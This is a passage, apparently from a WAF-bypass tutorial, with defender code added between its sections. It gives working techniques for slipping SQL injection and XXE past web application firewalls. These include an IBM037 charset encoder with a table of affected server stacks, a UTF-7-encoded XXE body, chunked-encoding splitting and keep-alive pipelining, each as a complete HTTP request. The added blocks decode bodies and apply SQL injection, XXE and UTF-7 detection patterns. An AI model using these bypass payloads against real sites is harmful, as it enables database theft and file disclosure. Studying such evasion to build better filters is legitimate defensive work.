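        value = percent_decode(value.replace("+", " "))
        params.setdefault(name, []).append(value)
    return params


def inspect_target(target: str) -> dict:
    """Normalise a request-target, then apply the rule to the canonical path and
    to every decoded value of the parameter, not just the first or the last."""
    raw_path, _, raw_query = target.partition("?")
    path = canonical_path(raw_path)
    params = parse_query(raw_query)
    findings: List[str] = []
    if path.startswith("/get/"):
        findings = [v for v in params.get("id", []) if SHELL_META.search(v)]
    return {"path": path, "params": params, "findings": findings}


if __name__ == "__main__":
    for t in ["/get/;mhz=cpv?id=;netstat%20-ant",
              "/get/co7t/../co7t/../?%00id=;netstat%2500-ant",
              "/get/?id=test&id=test&id=;netstat%u0000-ant"]:
        print(t, "->", inspect_target(t))
```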
During testing, the following request was found to be blocked; it clearly carries an injection signature:

```http
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--
```

We use the following encoding technique to get it past the WAF:

```python
# -*- coding: utf-8 -*-
# Python 2 code (urllib.unquote / print statement), as on the original page
import urllib


def paramEncode(params="", charset="IBM037", encodeEqualSign=False,
                encodeAmpersand=False, urldecodeInput=True, urlencodeOutput=True):
    """Re-encode every name and value of a form body in the given charset,
    then percent-encode the result; '=' and '&' stay ASCII unless requested."""
    result = ""
    equalSign = "="
    ampersand = "&"
    if encodeEqualSign:
        equalSign = equalSign.encode(charset)
    if encodeAmpersand:
        ampersand = ampersand.encode(charset)
    params_list = params.split("&")
    for param_pair in params_list:
        param, value = param_pair.split("=")
        if urldecodeInput:
            param = urllib.unquote(param).decode('utf8')
            value = urllib.unquote(value).decode('utf8')
        param = param.encode(charset)
        value = value.encode(charset)
        if urlencodeOutput:
            param = urllib.quote_plus(param)
            value = urllib.quote_plus(value)
        if result:
            result += ampersand
        result += param + equalSign + value
    return result


# for IIS
print paramEncode("input1='union all select * from users--")
# prints %89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
```

After encoding, the request becomes the following and bypasses the WAF:

```http
POST /sample.aspx?%89%95%97%A4%A3%F0=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115

%89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
```
Target | POST (application/x-www-form-urlencoded) |
---|---|
Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 |
Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 |
Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 |
Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 |
Apache-PHP5 (mod_php and FastCGI) | None |
IIS8-PHP7.1-FastCGI | None |
IIS6, 7.5, 8, 10 - classic ASP | None |
IIS6, 7.5, 8, 10 - ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 |
In an XXE attack, the following request was blocked by the WAF:

```http
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: text/xml; charset=UTF-8
Content-Length: 228
Connection: close
COOKIE: security_level=0; PHPSESSID=605bac73f50d32d09e96fd20a3df17e8

]>
```

UTF-7 encoding the key part of the payload gets it past the WAF:

```http
POST /bWAPP/xxe-2.php HTTP/1.1
Host: 192.168.1.101
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: text/xml; charset=UTF-8
Content-Length: 228
Connection: close
COOKIE: security_level=0; PHPSESSID=605bac73f50d32d09e96fd20a3df17e8

+ADwAIQBFAE4AVABJAFQAWQAgAHQ-e+AHMAdAAgAFMAWQBTAFQARQBNACAAIAAiAC8-e+AHQAYwAvAHAAYQBzAHMAdwBvAHI-d+ACIAPg-
]>
```
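Added as a defender's example (not from the original article) covering both the IBM037 form-body trick and the UTF-7 XXE body above: decode the body the way the backend will, using the declared charset, before evaluating any keyword rule, and treat an unexpected charset or a UTF-7 shift sequence as a finding in its own right. The charset allow-list and the two rules are assumptions; the two sample bodies are the page's.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_to_bytes

# Assumption: this application never legitimately submits any other charset.
ALLOWED_CHARSETS = {"utf-8", "us-ascii", "iso-8859-1"}
SQLI = re.compile(r"\bunion\b.*\bselect\b", re.I)
XXE = re.compile(r"<!ENTITY\b.*\bSYSTEM\b", re.I)
UTF7_SHIFT = re.compile(rb"\+[A-Za-z0-9+/]{3,}-")   # e.g. "+ADw-" (a UTF-7 '<')


def declared_charset(content_type: str) -> str:
    m = re.search(r";\s*charset=\"?([\w.:-]+)", content_type, re.I)
    return m.group(1).lower() if m else "utf-8"


def decode_form(body: bytes, charset: str) -> Dict[str, str]:
    """Split on & and = first, then percent-decode and charset-decode each part:
    the order the page's paramEncode() relies on ('=' and '&' stay ASCII)."""
    fields = {}
    for pair in body.split(b"&"):
        name, _, value = pair.partition(b"=")
        fields[unquote_to_bytes(name).decode(charset)] = (
            unquote_to_bytes(value.replace(b"+", b" ")).decode(charset))
    return fields


def inspect_body(content_type: str, body: bytes) -> List[str]:
    """Return rule findings for a request body after decoding it as the backend will."""
    findings: List[str] = []
    charset = declared_charset(content_type)
    if charset not in ALLOWED_CHARSETS:
        findings.append(f"charset not allowed: {charset}")
    try:
        if content_type.lower().startswith("application/x-www-form-urlencoded"):
            texts = list(decode_form(body, charset).values())
        else:
            # An XML body may switch encoding on its own; a UTF-7 shift sequence
            # inside a body declared as UTF-8 is exactly the page's bypass.
            if UTF7_SHIFT.search(body):
                findings.append(f"UTF-7 shift sequence in body declared as {charset}")
                charset = "utf-7"
            texts = [body.decode(charset)]
    except (LookupError, UnicodeDecodeError) as exc:
        return findings + [f"undecodable body: {exc}"]
    for text in texts:
        if SQLI.search(text):
            findings.append(f"sql injection pattern: {text}")
        if XXE.search(text):
            findings.append(f"external entity declaration: {text}")
    return findings


# The page's two bypass bodies, embedded here as sample input.
IBM037_BODY = (b"%89%95%97%A4%A3%F1=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83"
               b"%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60")
UTF7_BODY = (b"+ADwAIQBFAE4AVABJAFQAWQAgAHQ-e+AHMAdAAgAFMAWQBTAFQARQBNACAAIAAiAC8-e"
             b"+AHQAYwAvAHAAYQBzAHMAdwBvAHI-d+ACIAPg-")

if __name__ == "__main__":
    print(inspect_body("application/x-www-form-urlencoded; charset=ibm037", IBM037_BODY))
    print(inspect_body("text/xml; charset=UTF-8", UTF7_BODY))
```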
During testing, the following request was found to be blocked; it clearly carries an injection signature:

```http
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41

input1='union all select * from users--
```

Adding Transfer-Encoding: chunked to the headers declares that the message uses chunked encoding. The data part of the POST body must then be sent as a series of chunks. Each chunk consists of a hexadecimal length value and the data; the length value occupies its own line, and it does not count the CRLF that ends the length line nor the CRLF that ends the chunk data. Finally, a 0 on a line of its own marks the end.

```http
POST /sample.aspx?input0=something HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 110
Transfer-Encoding: chunked

5;
input
4;
1='u
5;
nion
4;
all
5;
selec
4;
t *
4;
from
5;
user
3;
s--
0
```
The original request carries an obvious signature and is blocked:

```http
GET /sample.aspx?input0=something&input1='union+all+select+*+from+users-- HTTP/1.1
HOST: victim.com
```

HTTP is carried over TCP. When a browser issues an HTTP request, it first establishes a TCP connection with the server and then sends the HTTP packet, which contains a Connection field, normally with the value close; containers such as Apache use this field to decide whether to keep the TCP connection open or close it. When the content to send is too large for one HTTP packet and has to be sent in several parts, the value becomes keep-alive, meaning the TCP connection established by this HTTP request is not closed until the content is finished and Connection becomes close. The following request packet may achieve a bypass:

```http
GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

GET / HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection:keep-alive

GET /sample.aspx?input0=something&input1='union+all+select+*+from+users-- HTTP/1.1
HOST: victim.com
```
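Added as a defender's example for the chunked-encoding and keep-alive sections above (not code from the original article): reassemble a chunked body, including the page's "5;" size lines with an empty chunk extension, and cut a keep-alive stream into every request it pipelines, so the rule runs on each reassembled request rather than on the first bytes read. The two sample streams are constructed to follow the page's requests (chunk sizes made consistent with their data), and the keyword rule is an assumption.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

SQLI = re.compile(r"\bunion\b.*\bselect\b", re.I)   # assumed rule


def decode_chunked(body: bytes) -> Tuple[bytes, int]:
    """Reassemble a chunked body; returns (payload, bytes consumed).
    The size line is hex, optionally followed by ';extension' (page: '5;')."""
    out, pos = bytearray(), 0
    while True:
        nl = body.find(b"\n", pos)
        if nl < 0:
            raise ValueError("truncated chunk-size line")
        size = int(body[pos:nl].split(b";", 1)[0].strip(), 16)
        pos = nl + 1
        if size == 0:                     # last-chunk; swallow the final CRLF
            return bytes(out), pos + (2 if body.startswith(b"\r\n", pos) else 0)
        chunk = body[pos:pos + size]
        if len(chunk) < size:
            raise ValueError("truncated chunk data")
        out += chunk
        pos += size
        if body.startswith(b"\r\n", pos):
            pos += 2
        elif body.startswith(b"\n", pos):
            pos += 1
        else:
            raise ValueError("chunk data not followed by CRLF")


def split_requests(stream: bytes) -> List[Dict]:
    """Cut one TCP read into the HTTP requests it carries; each gets its own
    headers, decoded body and findings (CL+TE together is flagged)."""
    requests, pos = [], 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end < 0:
            raise ValueError("incomplete request head")
        request_line, *lines = stream[pos:head_end].decode("iso-8859-1").split("\r\n")
        headers: Dict[str, List[str]] = {}
        for line in lines:
            name, _, value = line.partition(":")
            headers.setdefault(name.strip().lower(), []).append(value.strip())
        pos = head_end + 4
        findings = []
        if "transfer-encoding" in headers and "content-length" in headers:
            findings.append("both Content-Length and Transfer-Encoding present")
        if "chunked" in ",".join(headers.get("transfer-encoding", [])).lower():
            body, used = decode_chunked(stream[pos:])
            pos += used
        else:
            length = int(headers.get("content-length", ["0"])[0])
            body, pos = stream[pos:pos + length], pos + length
        requests.append({"request_line": request_line, "headers": headers,
                         "body": body, "findings": findings})
    return requests


def inspect_stream(stream: bytes) -> List[Dict]:
    """Apply the rule to the request-target and body of every pipelined request."""
    results = split_requests(stream)
    for req in results:
        parts = req["request_line"].split(" ")
        target = parts[1] if len(parts) > 1 else ""
        text = unquote(target.replace("+", " ")) + " " + unquote(req["body"].decode("iso-8859-1"))
        if SQLI.search(text):
            req["findings"].append("sql injection pattern")
    return results


# Constructed samples following the page's requests.
CHUNKED_BODY = (b"5;\r\ninput\r\n4;\r\n1='u\r\n5;\r\nnion \r\n4;\r\nall \r\n5;\r\nselec\r\n"
                b"4;\r\nt * \r\n5;\r\nfrom \r\n5;\r\nusers\r\n2;\r\n--\r\n0\r\n\r\n")
CHUNKED = (b"POST /sample.aspx?input0=something HTTP/1.1\r\nHOST: victim.com\r\n"
           b"Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
           b"Content-Length: 110\r\nTransfer-Encoding: chunked\r\n\r\n" + CHUNKED_BODY)
KEEPALIVE_GET = (b"GET / HTTP/1.1\r\nHOST: victim.com\r\n"
                 b"Content-Type: application/x-www-form-urlencoded; charset=utf-8\r\n"
                 b"Connection:keep-alive\r\n\r\n")
PIPELINED = KEEPALIVE_GET * 4 + (b"GET /sample.aspx?input0=something&input1='union+all+select+*"
                                 b"+from+users-- HTTP/1.1\r\nHOST: victim.com\r\n\r\n")

if __name__ == "__main__":
    for req in inspect_stream(PIPELINED) + inspect_stream(CHUNKED):
        print(req["request_line"], req["findings"])
```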